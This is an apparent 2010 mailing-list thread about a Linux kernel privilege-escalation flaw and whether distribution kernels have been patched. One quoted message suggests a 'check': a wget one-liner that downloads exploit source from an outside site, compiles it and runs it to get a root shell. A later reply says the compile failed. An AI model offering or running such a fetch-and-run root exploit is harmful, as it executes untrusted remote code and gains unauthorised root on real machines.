Re: [tlug] Linux Kernel Exploit News

On 09/23/2010 12:36 PM, Kalin KOZHUHAROV wrote:
On Thu, Sep 23, 2010 at 10:33, CL<az.4tlug@example.com>  wrote:

I have not applied the patch as it appears to be an enterprise problem
more than an individual PC one.  Maybe people who know more could comment.

It is not "enterprise problem, pretty much any recent 64bit kernel was
affected... Get yourself one of the latest stable (released 1-2d ago).

All of the *buntus updated their kernel a couple of days back. Are you saying that fixed this problem? I find it hard to believe that even ZD would be _that_ far behind the curve.

If you want to check whether your system is affected, as a normal user do:

$ wget -q http://thinrope.net/s/robert_you_suck.c -O - |gcc -x c -o
r00t -&&  ./r00t

If you get a root shell, guess what - YOU ARE affected.

It says:

(.text+0x20): undefined reference to `main'
collect2: ld returned 1 exit status

So, I guess I am not got.

--
CL